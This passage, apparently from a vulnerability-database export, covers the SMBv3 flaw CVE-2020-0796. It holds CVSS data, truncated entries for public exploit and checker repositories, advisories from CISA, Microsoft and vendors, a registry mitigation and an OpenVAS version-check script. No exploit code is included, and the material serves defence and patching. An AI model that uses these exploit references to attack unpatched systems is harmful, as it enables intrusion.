"description": "# CVE-2020-0796 Remote Code Execution POC\n\n(c) 2020 ZecOps, Inc....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-20T14:35:48", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2022-04-04T13:58:48", "id": "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:49:58", "description": "# GUI Check CVE-2020-0796\n\n#### \u52d8\u8bef\uff1a\n\u6b63\u786e\u7684CVE\u540d\u79f0\u662fCVE-2020-0796\uff0c\u800c\u4e0d\u662fCV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-14T07:59:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-0976"], "modified": "2021-12-05T20:44:03", "id": "C8967016-587F-5098-AD59-ED5BF752FD5A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T02:29:29", "description": "# Ladon Scanner For Python\n\n[ \nCurrently, Microsoft has released the appropriate security patches, Qi'an the letter strongly recommends that users immediately install patches to protect against this vulnerability to cause the risk. 
Patch installation can access the following links: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 \nSuch as temporarily not convenient to install the patch, Microsoft recommends executing the following command disables SMB 3.0 compression function: \nSet-ItemProperty-Path\"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\"DisableCompression-Type DWORD-Value 1-Force \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-14T00:00:00", "title": "Odd security letter issued to Microsoft a high-risk vulnerability warning Win10 as the main effect of the target-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-14T00:00:00", "id": "MYHACK58:62202097543", "href": "http://www.myhack58.com/Article/html/3/62/2020/97543.htm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-07-15T19:58:18", "description": "Discover how to protect your systems against SMB vulnerabilities and the latest 
critical Microsoft vulnerabilities released.", "cvss3": {}, "published": "2020-03-17T20:12:00", "type": "akamaiblog", "title": "How To Protect Your Systems Against Critical SMB Vulnerabilities (CVE-2020-0796)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-17T20:12:00", "id": "AKAMAIBLOG:BBE7670A93BC8AF70B2207E0CEF64EAA", "href": "https://www.akamai.com/blog/security/how-to-protect-your-systems-against-critical-smb-vulnerabilities-cve-2020-0796", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft SMBv3 Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": 
"2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2020-0796", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2020-03-17T19:53:43", "description": "By Jon Munshaw and Vitor Ventura. Update (March 12, 2020): Microsoft released an out-of-band patch for CVE-2020-0796, a code execution vulnerability SMB client and server for Windows. An unauthenticated attacker could exploit this vulnerability to execute remote code. Snort rules 53425 - 53428 protect against exploitation of CVE-2020-0796. Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2020-03-12T10:00:14", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 March 2020: Vulnerability disclosures and Snort coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T10:00:14", "id": "TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/QDmutXTZ35E/microsoft-patch-tuesday-march-2020.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:35", "description": "Microsoft has released out-of-band security updates to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker could exploit this vulnerability to take control of an affected system. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following resources and apply the necessary updates or workarounds. 
\n\u2022 Microsoft Security Guidance for [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) \n\u2022 Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) \n\u2022 CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/12/microsoft-releases-out-band-security-updates-smb-rce-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for SMB RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "id": 
"CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/12/microsoft-releases-out-band-security-updates-smb-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:52", "description": "Microsoft has released a security advisory to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker can exploit this vulnerability to take control of an affected system. SMB is a network file-sharing protocol that allows client machines to access files on servers.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) and the CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>) and apply the the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/11/microsoft-server-message-block-rce-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "cisa", "title": "Microsoft Server Message Block RCE Vulnerability", "bulletinFamily": "info", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "id": "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/11/microsoft-server-message-block-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:42", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of publicly available and functional proof-of-concept (PoC) code that exploits CVE-2020-0796 in unpatched systems. Although Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber actors are targeting unpatched systems with the new PoC, according to recent open-source reports. CISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible. 
\n\nCISA also encourages users and administrators to review the following resources and apply the necessary updates or workarounds.\n\n * Microsoft Security Guidance for [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>)\n * Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>)\n * CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-05T00:00:00", "type": "cisa", "title": "Unpatched Microsoft Systems Vulnerable to CVE-2020-0796 ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2020-0796"], "modified": "2020-06-05T00:00:00", "id": "CISA:9D38592E642AD30FA4BC435AC4FFC304", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-11T11:32:58", "description": "CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n \nCVE-2021-36934\n\n| \n\nMicrosoft Windows SAM Local Privilege Escalation Vulnerability\n\n| \n\n2/24/2022 \n \nCVE-2020-0796\n\n| \n\nMicrosoft SMBv3 Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2018-1000861\n\n| \n\nJenkins Stapler Web Framework Deserialization of Untrusted Data Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-9791\n\n| \n\nApache Struts 1 Improper Input Validation Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-8464\n\n| \n\nMicrosoft Windows Shell (.lnk) Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-10271\n\n| \n\nOracle Corporation WebLogic Server Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0263\n\n| \n\nMicrosoft Win32k Privilege Escalation Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0262\n\n| \n\nMicrosoft Office Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0145\n\n| \n\nMicrosoft SMBv1 Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2017-0144\n\n| \n\nMicrosoft SMBv1 Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2016-3088 \n\n| \n\nApache ActiveMQ Improper Input Validation Vulnerability\n\n| 
\n\n8/10/2022 \n \nCVE-2015-2051\n\n| \n\nD-Link DIR-645 Router Remote Code Execution\n\n| \n\n8/10/2022 \n \nCVE-2015-1635\n\n| \n\nMicrosoft HTTP.sys Remote Code Execution Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2015-1130\n\n| \n\nApple OS X Authentication Bypass Vulnerability\n\n| \n\n8/10/2022 \n \nCVE-2014-4404\n\n| \n\nApple OS X Heap-Based Buffer Overflow Vulnerability\n\n| \n\n8/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. 
CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/02/10/cisa-adds-15-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-10T00:00:00", "type": "cisa", "title": "CISA Adds 15 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404", "CVE-2015-1130", "CVE-2015-1635", "CVE-2015-2051", "CVE-2016-3088", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-1000861", "CVE-2020-0796", "CVE-2021-36934"], "modified": "2022-02-10T00:00:00", "id": 
"CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/02/10/cisa-adds-15-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-03-20T18:49:58", "description": "This host is missing a critical security\n update according to Microsoft KB4551762", "cvss3": {}, "published": "2020-03-12T00:00:00", "type": "openvas", "title": "Microsoft Windows Server Message Block 3.1.1 RCE Vulnerability (KB4551762)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-19T00:00:00", "id": "OPENVAS:1361412562310816800", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816800", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the rsleferenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816800\");\n script_version(\"2020-03-19T10:52:32+0000\");\n script_cve_id(\"CVE-2020-0796\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-19 10:52:32 +0000 (Thu, 19 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-12 13:00:37 +0000 (Thu, 12 Mar 2020)\");\n script_name(\"Microsoft Windows Server Message Block 3.1.1 RCE Vulnerability (KB4551762)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4551762\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability is due to an error when the\n SMBv3 handles maliciously crafted compressed data packets. Both SMB Servers and\n clients are affected. To exploit the vulnerability against an SMB Server, an\n unauthenticated attacker could send a specially crafted packet to a targeted SMBv3\n Server. 
While as to exploit the vulnerability against an SMB Client, an\n unauthenticated attacker would need to configure a malicious SMBv3 Server and\n convince a user to connect to it.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code on the target SMB Server or SMB Client.\");\n\n script_tag(name:\"affected\", value:\"SMB 3.1.1(SMBv3) on\n\n - Windows 10 Version 1903 for 32-bit/x64-based Systems\n\n - Windows 10 Version 1909 for 32-bit/x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4551762/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdiplus.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_in_range(version:fileVer, test_version:\"10.0.18362.0\", test_version2:\"10.0.18362.719\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdiplus.dll\",\n file_version:fileVer, vulnerable_range:\"10.0.18362.0 - 10.0.18362.719\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:39:08", "description": "A 
vulnerability exists in Windows. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMBv3 Remote Code Execution (CVE-2020-0796)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-30T00:00:00", "id": "CPAI-2020-0136", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2022-08-24T11:29:07", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**What's new for Windows 10, version 1909 and Windows 10, version 1903 release notes**Windows 10, versions 1903 and 1909 share a common core operating system and an identical set of system files. 
As a result, the new features in Windows 10, version 1909 were included in the recent monthly quality update for Windows 10, version 1903 (released October 8, 2019), but are currently in a dormant state. These new features will remain dormant until they are turned on using an _enablement package_, which is a small, quick-to-install \u201cmaster switch\u201d that simply activates the Windows 10, version 1909 features.To reflect this change, the release notes for Windows 10, version 1903 and Windows 10, version 1909 will share an update history page. Each release page will contain a list of addressed issues for both 1903 and 1909 versions. Note that the 1909 version will always contain the fixes for 1903; however, 1903 will not contain the fixes for 1909. This page will provide you with the build numbers for both 1909 and 1903 versions so that it will be easier for support to assist you if you encounter issues.For more details about the enablement package and how to get the feature update, see the [Windows 10, version 1909 delivery options](<https://aka.ms/1909mechanics>) blog.\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a Microsoft Server Message Block 3.1.1 protocol issue that provides shared access to files and printers.\n\n## Improvements and fixes\n\n## \n\n__\n\nWindows 10, version 1909\n\nThis security update includes quality improvements. Key changes include:\n\n * * This build includes all the improvements from Windows 10, version 1903.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 1903\n\nThis security update includes quality improvements. 
